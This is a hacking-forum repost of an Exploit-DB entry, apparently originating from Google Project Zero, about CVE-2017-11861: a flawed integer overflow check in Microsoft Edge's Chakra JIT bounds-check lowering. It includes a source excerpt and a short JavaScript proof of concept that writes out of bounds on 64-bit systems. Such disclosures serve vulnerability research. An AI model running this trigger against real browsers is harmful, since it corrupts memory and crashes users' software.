Exploit Microsoft Edge Chakra: JIT - 'Lowerer::LowerBoundCheck' Incorrect Integer Overflow Check

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
43153
Проверка EDB
  1. Пройдено
Автор
GOOGLE SECURITY RESEARCH
Тип уязвимости
DOS
Платформа
WINDOWS
CVE
cve-2017-11861
Дата публикации
2017-11-16
Microsoft Edge Chakra: JIT - 'Lowerer::LowerBoundCheck' Incorrect Integer Overflow Check
Код:
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1343

Here's a snippet of the method.
void Lowerer::LowerBoundCheck(IR::Instr *const instr)
{
    ...
    if(rightOpnd->IsIntConstOpnd())
    {
        IntConstType newOffset;
        if(!IntConstMath::Add(offset, rightOpnd->AsIntConstOpnd()->GetValue(), &newOffset)) <<--- (a)
        {
            offset = newOffset;
            rightOpnd = nullptr;
            offsetOpnd = nullptr;
        }
    }
    ...
    if(!rightOpnd)
    {
        rightOpnd = IR::IntConstOpnd::New(offset, TyInt32, func);
    }
}

At (a), it uses "IntConstMath::Add" to check integer overflow. But the size of IntConstType equals to the size of pointer, and the "offset" variable is used as a 32-bit integer. So it may fail to check integer overflow on 64-bit system.

PoC:
*/

function f() {
    let arr = new Uint32Array(0x1000);
    for (let i = 0; i < 0x7fffffff;) {
        arr[++i] = 0x1234;
    }
}

f();
 
Источник
www.exploit-db.com

Похожие темы